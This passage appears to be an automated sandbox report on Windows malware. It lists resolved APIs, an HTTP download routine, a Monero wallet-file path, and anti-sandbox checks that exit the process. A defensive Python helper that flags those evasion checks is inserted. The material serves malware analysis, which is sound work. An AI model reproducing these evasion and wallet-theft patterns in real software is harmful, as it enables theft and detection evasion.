                                • LoadLibraryA.KERNEL32(01B8C958,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA04E
                                • LoadLibraryA.KERNEL32(01B8C8C8,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA060
                                • LoadLibraryA.KERNEL32(01B8C970,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA072
                                • LoadLibraryA.KERNEL32(01B8C8E0,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA083
                                • LoadLibraryA.KERNEL32(01B8C988,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA095
                                • LoadLibraryA.KERNEL32(01B8CCA0,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA0A7
                                • LoadLibraryA.KERNEL32(01B8CC40,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA0B8
                                • GetProcAddress.KERNEL32(75FD0000,01B767C0), ref: 00EDA0DA
                                • GetProcAddress.KERNEL32(75FD0000,01B8CC10), ref: 00EDA0F2
                                • GetProcAddress.KERNEL32(75FD0000,01B88BA0), ref: 00EDA10A
                                • GetProcAddress.KERNEL32(75FD0000,01B8CC58), ref: 00EDA123
                                • GetProcAddress.KERNEL32(75FD0000,01B76780), ref: 00EDA13B
                                • GetProcAddress.KERNEL32(73530000,01B7B158), ref: 00EDA160
                                • GetProcAddress.KERNEL32(73530000,01B76740), ref: 00EDA179
                                • GetProcAddress.KERNEL32(73530000,01B7B2E8), ref: 00EDA191
                                • GetProcAddress.KERNEL32(73530000,01B8CB68), ref: 00EDA1A9
                                • GetProcAddress.KERNEL32(73530000,01B8CC88), ref: 00EDA1C2
                                • GetProcAddress.KERNEL32(73530000,01B767A0), ref: 00EDA1DA
                                • GetProcAddress.KERNEL32(73530000,01B767E0), ref: 00EDA1F2
                                • GetProcAddress.KERNEL32(73530000,01B8CBE0), ref: 00EDA20B
                                • GetProcAddress.KERNEL32(763B0000,01B76800), ref: 00EDA22C
                                • GetProcAddress.KERNEL32(763B0000,01B76920), ref: 00EDA244
                                • GetProcAddress.KERNEL32(763B0000,01B8CCB8), ref: 00EDA25D
                                • GetProcAddress.KERNEL32(763B0000,01B8CB80), ref: 00EDA275
                                • GetProcAddress.KERNEL32(763B0000,01B76700), ref: 00EDA28D
                                • GetProcAddress.KERNEL32(750F0000,01B7B270), ref: 00EDA2B3
                                • GetProcAddress.KERNEL32(750F0000,01B7B1F8), ref: 00EDA2CB
                                • GetProcAddress.KERNEL32(750F0000,01B8CCD0), ref: 00EDA2E3
                                • GetProcAddress.KERNEL32(750F0000,01B76720), ref: 00EDA2FC
                                • GetProcAddress.KERNEL32(750F0000,01B76A00), ref: 00EDA314
                                • GetProcAddress.KERNEL32(750F0000,01B7B1D0), ref: 00EDA32C
                                • GetProcAddress.KERNEL32(75A50000,01B8CCE8), ref: 00EDA352
                                • GetProcAddress.KERNEL32(75A50000,01B76760), ref: 00EDA36A
                                • GetProcAddress.KERNEL32(75A50000,01B88A40), ref: 00EDA382
                                • GetProcAddress.KERNEL32(75A50000,01B8CBC8), ref: 00EDA39B
                                • GetProcAddress.KERNEL32(75A50000,01B8CC28), ref: 00EDA3B3
                                • GetProcAddress.KERNEL32(75A50000,01B76980), ref: 00EDA3CB
                                • GetProcAddress.KERNEL32(75A50000,01B76960), ref: 00EDA3E4
                                • GetProcAddress.KERNEL32(75A50000,01B8CBF8), ref: 00EDA3FC
                                • GetProcAddress.KERNEL32(75A50000,01B8CD60), ref: 00EDA414
                                • GetProcAddress.KERNEL32(75070000,01B769C0), ref: 00EDA436
                                • GetProcAddress.KERNEL32(75070000,01B8CD18), ref: 00EDA44E
                                • GetProcAddress.KERNEL32(75070000,01B8CB08), ref: 00EDA466
                                • GetProcAddress.KERNEL32(75070000,01B8CDC0), ref: 00EDA47F
                                • GetProcAddress.KERNEL32(75070000,01B8CC70), ref: 00EDA497
                                • GetProcAddress.KERNEL32(74E50000,01B76940), ref: 00EDA4B8
                                • GetProcAddress.KERNEL32(74E50000,01B76A20), ref: 00EDA4D1
                                • GetProcAddress.KERNEL32(75320000,01B76880), ref: 00EDA4F2
                                • GetProcAddress.KERNEL32(75320000,01B8CD90), ref: 00EDA50A
                                • GetProcAddress.KERNEL32(6F060000,01B769A0), ref: 00EDA530
                                • GetProcAddress.KERNEL32(6F060000,01B76820), ref: 00EDA548
                                • GetProcAddress.KERNEL32(6F060000,01B76840), ref: 00EDA560
                                • GetProcAddress.KERNEL32(6F060000,01B8CD00), ref: 00EDA579
                                • GetProcAddress.KERNEL32(6F060000,01B76860), ref: 00EDA591
                                • GetProcAddress.KERNEL32(6F060000,01B769E0), ref: 00EDA5A9
                                • GetProcAddress.KERNEL32(6F060000,01B766E0), ref: 00EDA5C2
                                • GetProcAddress.KERNEL32(6F060000,01B76680), ref: 00EDA5DA
                                • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00EDA5F1
                                • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00EDA607
                                • GetProcAddress.KERNEL32(74E00000,01B8CD30), ref: 00EDA629
                                • GetProcAddress.KERNEL32(74E00000,01B88B10), ref: 00EDA641
                                • GetProcAddress.KERNEL32(74E00000,01B8CD48), ref: 00EDA659
                                • GetProcAddress.KERNEL32(74E00000,01B8CD78), ref: 00EDA672
                                • GetProcAddress.KERNEL32(74DF0000,01B766A0), ref: 00EDA693
                                • GetProcAddress.KERNEL32(6F950000,01B8CDA8), ref: 00EDA6B4
                                • GetProcAddress.KERNEL32(6F950000,01B766C0), ref: 00EDA6CD
                                • GetProcAddress.KERNEL32(6F950000,01B8CDD8), ref: 00EDA6E5
                                • GetProcAddress.KERNEL32(6F950000,01B8CAF0), ref: 00EDA6FD
                                Strings
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166

                                Control-flow Graph (graph image with executed/not-executed legend; function at ec6280: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile loop, InternetCloseHandle)
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                • StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EC63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EC646D
                                • InternetCloseHandle.WININET(00000000), ref: 00EC64EF
                                • InternetCloseHandle.WININET(00000000), ref: 00EC64F9
                                • InternetCloseHandle.WININET(00000000), ref: 00EC6503
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195

                                Control-flow Graph (graph image with executed/not-executed legend; function at ed5510: repeated StrCmpCA result checks with a Sleep retry path)
                                APIs
                                  • Part of subcall function 00EDA820: lstrlen.KERNEL32(00EC4F05,?,?,00EC4F05,00EE0DDE), ref: 00EDA82B
                                  • Part of subcall function 00EDA820: lstrcpy.KERNEL32(00EE0DDE,00000000), ref: 00EDA885
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED56A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5857
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00ED51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5228
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5318
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED532F
                                  • Part of subcall function 00ED52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00ED5364
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED5383
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED53AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00ED5A1B
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 34558fc43bf4df0f55cff4d29951a9c9adafeaa1c61537f50c9e6aad13c39bae
                                • Instruction ID: caff34d595388edf75ecb8cc2021cc3b39343bf0fb2775f94ad931a11aa03269
                                • Opcode Fuzzy Hash: 34558fc43bf4df0f55cff4d29951a9c9adafeaa1c61537f50c9e6aad13c39bae
                                • Instruction Fuzzy Hash: 74E188769102049ACB18FBA0ED56EED73B8EF54300F44A13AB41677285EF715B4BCB92

                                 Control-flow Graph (each entry is a block id, its address range and the API calls made in the block, followed by the edges between block ids; the rendered graph marked blocks as Executed or Not Executed):
                                control_flow_graph 1301 ed17a0-ed17cd call edaad0 StrCmpCA 1304 ed17cf-ed17d1 ExitProcess 1301->1304 1305 ed17d7-ed17f1 call edaad0 1301->1305 1309 ed17f4-ed17f8 1305->1309 1310 ed17fe-ed1811 1309->1310 1311 ed19c2-ed19cd call eda800 1309->1311 1313 ed199e-ed19bd 1310->1313 1314 ed1817-ed181a 1310->1314 1313->1309 1316 ed18ad-ed18be StrCmpCA 1314->1316 1317 ed18cf-ed18e0 StrCmpCA 1314->1317 1318 ed198f-ed1999 call eda820 1314->1318 1319 ed1849-ed1858 call eda820 1314->1319 1320 ed1821-ed1830 call eda820 1314->1320 1321 ed185d-ed186e StrCmpCA 1314->1321 1322 ed187f-ed1890 StrCmpCA 1314->1322 1323 ed1835-ed1844 call eda820 1314->1323 1324 ed18f1-ed1902 StrCmpCA 1314->1324 1325 ed1951-ed1962 StrCmpCA 1314->1325 1326 ed1970-ed1981 StrCmpCA 1314->1326 1327 ed1913-ed1924 StrCmpCA 1314->1327 1328 ed1932-ed1943 StrCmpCA 1314->1328 1334 ed18ca 1316->1334 1335 ed18c0-ed18c3 1316->1335 1336 ed18ec 1317->1336 1337 ed18e2-ed18e5 1317->1337 1318->1313 1319->1313 1320->1313 1330 ed187a 1321->1330 1331 ed1870-ed1873 1321->1331 1332 ed189e-ed18a1 1322->1332 1333 ed1892-ed189c 1322->1333 1323->1313 1338 ed190e 1324->1338 1339 ed1904-ed1907 1324->1339 1344 ed196e 1325->1344 1345 ed1964-ed1967 1325->1345 1347 ed198d 1326->1347 1348 ed1983-ed1986 1326->1348 1340 ed1926-ed1929 1327->1340 1341 ed1930 1327->1341 1342 ed194f 1328->1342 1343 ed1945-ed1948 1328->1343 1330->1313 1331->1330 1353 ed18a8 1332->1353 1333->1353 1334->1313 1335->1334 1336->1313 1337->1336 1338->1313 1339->1338 1340->1341 1341->1313 1342->1313 1343->1342 1344->1313 1345->1344 1347->1313 1348->1347 1353->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00ED17C5
                                • ExitProcess.KERNEL32 ref: 00ED17D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 33bf15b12a95a4284cf5bdffeab5149d3f3ea99a69a57277f0c968c3013b0c8f
                                • Instruction ID: db48455c52308514dfd204463d916ba8bfe33c36e54f03c2610f40d69f7cbc11
                                • Opcode Fuzzy Hash: 33bf15b12a95a4284cf5bdffeab5149d3f3ea99a69a57277f0c968c3013b0c8f
                                • Instruction Fuzzy Hash: 8D515CB4A00209FFCB08DFA1D964ABE77B5EF84304F14609AE41677340D7B1AA92DB61

                                 Control-flow Graph (each entry is a block id, its address range and the API calls made in the block, followed by the edges between block ids; the rendered graph marked blocks as Executed or Not Executed):
                                control_flow_graph 1356 ed7500-ed754a GetWindowsDirectoryA 1357 ed754c 1356->1357 1358 ed7553-ed75c7 GetVolumeInformationA call ed8d00 * 3 1356->1358 1357->1358 1365 ed75d8-ed75df 1358->1365 1366 ed75fc-ed7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 ed75e1-ed75fa call ed8d00 1365->1367 1368 ed7619-ed7626 call eda740 1366->1368 1369 ed7628-ed7658 wsprintfA call eda740 1366->1369 1367->1365 1377 ed767e-ed768e 1368->1377 1369->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00ED7542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED760A
                                • wsprintfA.USER32 ref: 00ED7640
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$
                                • API String ID: 1544550907-3109660283
                                • Opcode ID: 28645bd24926bdf46ce1472992cfced0ca6bd9a87783de69025c004d2c84672f
                                • Instruction ID: c2028bef5224c297fe6cc0d200e299e3455a1a1d55021bc646953b282c8cee38
                                • Opcode Fuzzy Hash: 28645bd24926bdf46ce1472992cfced0ca6bd9a87783de69025c004d2c84672f
                                • Instruction Fuzzy Hash: A2418FB1D04358ABDB11DF94DC45BEEBBB8EF08704F10009AF50977280E774AA85CBA5

                                APIs
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80750), ref: 00ED98A1
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B807B0), ref: 00ED98BA
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B806F0), ref: 00ED98D2
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80780), ref: 00ED98EA
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80570), ref: 00ED9903
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B88B00), ref: 00ED991B
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B76440), ref: 00ED9933
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B76300), ref: 00ED994C
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80768), ref: 00ED9964
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80708), ref: 00ED997C
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80798), ref: 00ED9995
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B805B8), ref: 00ED99AD
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B76320), ref: 00ED99C5
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B807C8), ref: 00ED99DE
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EC11D0: ExitProcess.KERNEL32 ref: 00EC1211
                                  • Part of subcall function 00EC1160: GetSystemInfo.KERNEL32(?), ref: 00EC116A
                                  • Part of subcall function 00EC1160: ExitProcess.KERNEL32 ref: 00EC117E
                                  • Part of subcall function 00EC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EC112B
                                  • Part of subcall function 00EC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EC1132
                                  • Part of subcall function 00EC1110: ExitProcess.KERNEL32 ref: 00EC1143
                                  • Part of subcall function 00EC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EC123E
                                  • Part of subcall function 00EC1220: __aulldiv.LIBCMT ref: 00EC1258
                                  • Part of subcall function 00EC1220: __aulldiv.LIBCMT ref: 00EC1266
                                  • Part of subcall function 00EC1220: ExitProcess.KERNEL32 ref: 00EC1294
                                  • Part of subcall function 00ED6770: GetUserDefaultLangID.KERNEL32 ref: 00ED6774
                                  • Part of subcall function 00EC1190: ExitProcess.KERNEL32 ref: 00EC11C6
                                  • Part of subcall function 00ED7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                  • Part of subcall function 00ED7850: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                  • Part of subcall function 00ED7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                  • Part of subcall function 00ED78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                  • Part of subcall function 00ED78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                  • Part of subcall function 00ED78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01B88AA0,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00ED6AF9
                                • Sleep.KERNEL32(00001770), ref: 00ED6B04
                                • CloseHandle.KERNEL32(?,00000000,?,01B88AA0,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6B1A
                                • ExitProcess.KERNEL32 ref: 00ED6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: 69262e7203cfb903c2ec87e958661759a52543cc309e5eff15dd17fe1f6b9415
                                • Instruction ID: 99cbdc46a7953657644bab7c7e8b1cbb7f5dcdff0b453c0481b2641d3aac3b0e
                                • Opcode Fuzzy Hash: 69262e7203cfb903c2ec87e958661759a52543cc309e5eff15dd17fe1f6b9415
                                • Instruction Fuzzy Hash: EA314075D002089ADB09F7E0E856FEE77B8EF44340F04652AF512B2282DF715A43D7A6
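The subcall listing above pairs several environment queries (GetSystemInfo at 00EC1160, VirtualAllocExNuma at 00EC1110, GlobalMemoryStatusEx followed by two __aulldiv calls at 00EC1220, GetUserDefaultLangID at 00ED6770) with ExitProcess in the same or a neighbouring function; that pairing is the pattern behind the report's "Found evasive API chain" and sandbox-detection signatures. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses API lines in the format used on this page into records, groups them by calling function, and flags functions that combine an environment query, or the OpenEventA/CreateEventA/Sleep single-instance pattern, with a call to ExitProcess, listing the ExitProcess sites an analyst would breakpoint or patch. The sample lines are copied from this report; the caller label 00ED6ABA given to the top-level lines is an assumption taken from the first block of that routine's control-flow graph, and the descriptions in ENV_CHECKS are the editor's, not the report's.

```python
import re
from collections import defaultdict

# Constructed sample: API lines copied from this report. The top-level lines
# (no "Part of subcall function" prefix) belong to the routine whose graph
# starts at 00ED6ABA, which is the caller label assumed for them below.
SAMPLE_API_LINES = """
• Part of subcall function 00EC11D0: ExitProcess.KERNEL32 ref: 00EC1211
• Part of subcall function 00EC1160: GetSystemInfo.KERNEL32(?), ref: 00EC116A
• Part of subcall function 00EC1160: ExitProcess.KERNEL32 ref: 00EC117E
• Part of subcall function 00EC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EC112B
• Part of subcall function 00EC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EC1132
• Part of subcall function 00EC1110: ExitProcess.KERNEL32 ref: 00EC1143
• Part of subcall function 00EC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EC123E
• Part of subcall function 00EC1220: __aulldiv.LIBCMT ref: 00EC1258
• Part of subcall function 00EC1220: __aulldiv.LIBCMT ref: 00EC1266
• Part of subcall function 00EC1220: ExitProcess.KERNEL32 ref: 00EC1294
• Part of subcall function 00ED6770: GetUserDefaultLangID.KERNEL32 ref: 00ED6774
• Part of subcall function 00EC1190: ExitProcess.KERNEL32 ref: 00EC11C6
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01B88AA0,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6ACA
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6AE8
• CloseHandle.KERNEL32(00000000), ref: 00ED6AF9
• Sleep.KERNEL32(00001770), ref: 00ED6B04
• ExitProcess.KERNEL32 ref: 00ED6B22
"""

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function ([0-9A-F]+):\s*)?"  # optional caller
    r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Z0-9]+)"                      # Api.MODULE
    r"(?:\((.*)\))?,?\s*ref:\s*([0-9A-F]+)\s*$"                   # (args), ref
)


def parse_api_lines(text, function):
    """Turn the report's API lines into records; top-level lines get `function` as caller."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        caller, api, module, args, ref = m.groups()
        records.append({
            "caller": caller or function,
            "api": api,
            "module": module,
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": ref,
        })
    return records


ENV_CHECKS = {  # editor's descriptions of what each query exposes to an anti-sandbox check
    "GetSystemInfo": "processor count and page size",
    "GlobalMemoryStatusEx": "physical memory size",
    "VirtualAllocExNuma": "NUMA-aware allocation support",
    "GetUserDefaultLangID": "default user locale",
}


def find_gates(records):
    """Functions that combine an environment query (or the OpenEventA/CreateEventA/Sleep
    single-instance pattern) with ExitProcess, keyed by caller address."""
    by_caller = defaultdict(list)
    for r in records:
        by_caller[r["caller"]].append(r)
    gates = {}
    for caller, recs in by_caller.items():
        apis = [r["api"] for r in recs]
        exit_refs = [r["ref"] for r in recs if r["api"] == "ExitProcess"]
        checks = [a for a in apis if a in ENV_CHECKS]
        single = {"OpenEventA", "CreateEventA", "Sleep"} <= set(apis)
        if exit_refs and (checks or single):
            gates[caller] = {
                "checks": checks,
                "single_instance": single,
                "exit_refs": exit_refs,
                # Sleep's first argument is hex milliseconds in the listing (00001770 = 6000 ms)
                "sleep_ms": [int(r["args"][0], 16) for r in recs
                             if r["api"] == "Sleep" and r["args"]],
            }
    return gates


if __name__ == "__main__":
    for caller, g in sorted(find_gates(parse_api_lines(SAMPLE_API_LINES, "00ED6ABA")).items()):
        what = [ENV_CHECKS[c] for c in g["checks"]]
        if g["single_instance"]:
            what.append("single-instance event, sleeps %s ms" % g["sleep_ms"])
        print(caller, "->", "; ".join(what), "| ExitProcess at", ", ".join(g["exit_refs"]))
```

A per-function rule cannot pair GetUserDefaultLangID (listed under 00ED6770) with the ExitProcess listed under 00EC1190, because the report shows them as separate subcalls; the locale-check signature in the report's summary comes from its own tracing rather than from this grouping. Functions that only call ExitProcess (00EC11D0, 00EC1190) are deliberately not flagged, since the listing does not show what they test.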

                                 Control-flow Graph (each entry is a block id, its address range and the API calls made in the block, followed by the edges between block ids; the rendered graph marked blocks as Executed or Not Executed):
                                control_flow_graph 1436 ec1220-ec1247 call ed89b0 GlobalMemoryStatusEx 1439 ec1249-ec1271 call edda00 * 2 1436->1439 1440 ec1273-ec127a 1436->1440 1442 ec1281-ec1285 1439->1442 1440->1442 1444 ec129a-ec129d 1442->1444 1445 ec1287 1442->1445 1446 ec1289-ec1290 1445->1446 1447 ec1292-ec1294 ExitProcess 1445->1447 1446->1444 1446->1447
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EC123E
                                • __aulldiv.LIBCMT ref: 00EC1258
                                • __aulldiv.LIBCMT ref: 00EC1266
                                • ExitProcess.KERNEL32 ref: 00EC1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: 55ddfa6102ad97908fad552aa2bb59df5b95bb2dd0aa7a41cf91ba7fd90f5aaf
                                • Instruction ID: 7a803a1b611b289c94e5370dea8e0f6004e78349a33670d11223df9db4607408
                                • Opcode Fuzzy Hash: 55ddfa6102ad97908fad552aa2bb59df5b95bb2dd0aa7a41cf91ba7fd90f5aaf
                                • Instruction Fuzzy Hash: 1601A2B0D44308BAEB14EBD0CD49FADB7B8EF00705F208049F705B62C1D7B555428798

                                 Control-flow Graph (each entry is a block id, its address range and the API calls made in the block, followed by the edges between block ids; the rendered graph marked blocks as Executed or Not Executed):
                                control_flow_graph 1450 ed6af3 1451 ed6b0a 1450->1451 1453 ed6b0c-ed6b22 call ed6920 call ed5b10 CloseHandle ExitProcess 1451->1453 1454 ed6aba-ed6ad7 call edaad0 OpenEventA 1451->1454 1460 ed6ad9-ed6af1 call edaad0 CreateEventA 1454->1460 1461 ed6af5-ed6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01B88AA0,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00ED6AF9
                                • Sleep.KERNEL32(00001770), ref: 00ED6B04
                                • CloseHandle.KERNEL32(?,00000000,?,01B88AA0,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6B1A
                                • ExitProcess.KERNEL32 ref: 00ED6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 6c498f3da2f1c194b19db8a8799f3720a160a1f4dd82df2fffbbf472bd7abbe3
                                • Instruction ID: c3af2cf3e5977176c26fe426d813e8f010f909eca9c40797493384d06b2bc3ce
                                • Opcode Fuzzy Hash: 6c498f3da2f1c194b19db8a8799f3720a160a1f4dd82df2fffbbf472bd7abbe3
                                • Instruction Fuzzy Hash: F8F05E30940319ABEB20ABA0EC06BBD7B74EF04701F10A527F513B22C1DBF05682D756
